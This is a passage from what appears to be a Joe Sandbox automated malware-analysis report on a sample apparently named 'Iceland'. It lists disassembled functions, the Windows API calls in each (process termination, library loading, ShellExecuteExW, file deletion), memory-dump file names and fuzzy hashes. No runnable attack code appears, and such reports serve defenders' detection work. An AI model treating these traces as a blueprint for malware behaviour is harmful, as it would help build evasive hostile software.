                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F47B
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F485
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A8F48C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                • Opcode ID: 2f86a5806ce79c21e98a26ad1be0beb50c601c2a3d0afb50c72adb786cb6bee9
                                                                                                                                                                                                                                                                • Instruction ID: 6785dc7f6e04251d74a6c015c19946d732ec1db36423e06d855d80fe96008747
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f86a5806ce79c21e98a26ad1be0beb50c601c2a3d0afb50c72adb786cb6bee9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF05432241159BFE72197929C0EEEF7F7CEFC6B11F000259F601D10A2E7A45A42C6B5
                                                                                                                                                                                                                                                                Function 00A634D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?), ref: 00A634EF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A63506
                                                                                                                                                                                                                                                                • GetWindowDC.USER32(?), ref: 00A63512
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00A63521
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A63533
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 00A6354D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 272304278-0
                                                                                                                                                                                                                                                                • Opcode ID: c58ca62b7686af36d2510daaa44421fb3cf464d364d296ed02be3e354d61b746
                                                                                                                                                                                                                                                                • Instruction ID: 42c36ad24fc868ce52924913d2ed639751af56395124a82396759f252b902d83
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58ca62b7686af36d2510daaa44421fb3cf464d364d296ed02be3e354d61b746
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F012832540115EFDB509BA4DC08BE97BB5FB04321F500260FA1AA21B2DB311E52AF10
                                                                                                                                                                                                                                                                Function 00A821C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A821CC
                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00A821D8
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A821E1
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A821E9
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A821F2
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A821F9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                                                                • Opcode ID: 637101a5e46b2a615913463dea6c0d8c7c3c491636f71164edcee37c893c0f1b
                                                                                                                                                                                                                                                                • Instruction ID: c7fdbfd938aa827106d37f21eb7a646a94b762926367985cbe0a594d24d59f81
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637101a5e46b2a615913463dea6c0d8c7c3c491636f71164edcee37c893c0f1b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6E01AB6008105BFDB019FE5EC0CD4ABF79FF49322B104320F22586072EB329462DB50
                                                                                                                                                                                                                                                                Function 00A8CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A8CF99
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8CFE0
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A8D047
                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A8D075
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 6b30af5f7641de068eb23e410b54eaf0840cb743bf0d878a89f695fd8731ddf4
                                                                                                                                                                                                                                                                • Instruction ID: a2fd90ce9cdb140ca1bd2339f14b2ce37e790d347da5cb1ae4db010669e371c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b30af5f7641de068eb23e410b54eaf0840cb743bf0d878a89f695fd8731ddf4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5551CE716043009BE724FF68D945B6BBBF8AF85364F040A29FA92D72D1DB70CD458B62
                                                                                                                                                                                                                                                                Function 00AAB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00AAB903
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 00AAB998
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAB9C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                • Opcode ID: 0b946cbe782b0da9a63e65561a60336d22d8e9079f665e43c1488f9f1d49a87c
                                                                                                                                                                                                                                                                • Instruction ID: a590c4075f2d66b55ad21d53bd0417997a6eb087460d3a8cf141248eb65bedd3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b946cbe782b0da9a63e65561a60336d22d8e9079f665e43c1488f9f1d49a87c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29718C75A10225DFCB14DF58C594A9EBBF4FF09310F0484A9E856AB3A2CB75ED41CBA0
                                                                                                                                                                                                                                                                Function 00A87B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A87B6D
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A87BA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A87BB4
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A87C36
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                • Opcode ID: 751e5cda53e3b47475bd405a7c9af4577d5db1db08e5f149317fbe2b91d6ec55
                                                                                                                                                                                                                                                                • Instruction ID: 4a2aebdbded050c8e655523680243ef4d29a95a4ed43d83d022342a30dcc477f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 751e5cda53e3b47475bd405a7c9af4577d5db1db08e5f149317fbe2b91d6ec55
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 184180B1604204EFDB15EF64D884A9F7BB9EF44314F2481ADAD069F216DBB1DD44CBA0
                                                                                                                                                                                                                                                                Function 00AB4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AB48D1
                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 00AB48E6
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AB492E
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00AB4941
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 1be431f070485cac4b4b7f9fc15afab8eb6ce2deff4430aef04f1fcc7a11b57c
                                                                                                                                                                                                                                                                • Instruction ID: 9fc54addfb586b490a34a6839925af800bae11a1f0cb9cce734aaa36f09a2ca5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1be431f070485cac4b4b7f9fc15afab8eb6ce2deff4430aef04f1fcc7a11b57c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96413975A01209EFDB20CFA5D884EEABBB9FF0A324F044129F95597252D730ED55CBA0
                                                                                                                                                                                                                                                                Function 00A8272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A827B3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A827C6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A827F6
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 7846044b0362d5f7bcea04e7b2d0eb015c62f1ede0ff33f6de2ebdfb2713c80b
                                                                                                                                                                                                                                                                • Instruction ID: ee1fefd4864da1c6fa6929310f5ff030bc29082656c88702a2d3c56eb1eba905
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7846044b0362d5f7bcea04e7b2d0eb015c62f1ede0ff33f6de2ebdfb2713c80b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78210275940104BFDB09ABA8DD46DFEBBB8DF553A0F104629F422A71E1DB384D0A9B60
                                                                                                                                                                                                                                                                Function 00AB39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AB3A29
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00AB3A30
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AB3A45
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB3A4D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                • Opcode ID: 92ce7ec65d12b79f6952044ba5abe5b9af46fd302e90ef7a1ade1aad8a2dde31
                                                                                                                                                                                                                                                                • Instruction ID: e0d202980fba7ea26424c6317b0784c95962e10955ae353ab52683746b4e1786
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92ce7ec65d12b79f6952044ba5abe5b9af46fd302e90ef7a1ade1aad8a2dde31
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F921AEB2600205ABEF109FA4DC90FFB77ADEB443A4F215218FA91961A2D772CD519760
                                                                                                                                                                                                                                                                Function 00A450DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A4508E,?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002), ref: 00A450FD
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A45110
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00A4508E,?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45133
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: 31f2bd9f0eca750139f6a5fe5f326796972ae8a135288bb9b152ee8cd067019b
                                                                                                                                                                                                                                                                • Instruction ID: 448a1d63bf076c1da45efdf87fad52cdabab0cdb45855d7151b39cbabbf4134e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31f2bd9f0eca750139f6a5fe5f326796972ae8a135288bb9b152ee8cd067019b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF06834A00208BFDB159FE8DC49F9DBFB4EF44752F040268F805A6161DB749D52DB90
                                                                                                                                                                                                                                                                Function 00A26607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26610
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A26622
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26635
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                • Opcode ID: be1872e5fb62a481cc26dd1ff42ece219db40f78ff5a1b3744a12eb5f94d90ce
                                                                                                                                                                                                                                                                • Instruction ID: 8f9aba8001e8775f9e2399b1791646edead2cba8f9f34faae742e0eac3b0711e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be1872e5fb62a481cc26dd1ff42ece219db40f78ff5a1b3744a12eb5f94d90ce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1D012356136B2675226676D7C1898E6A18AE96F117050635F800A6125EF64CD1385A8
                                                                                                                                                                                                                                                                Function 00A93306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A935C4
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00A93646
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A9365C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A9366D
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A9367F
                                                                                                                                                                                                                                                                Memory Dump Source
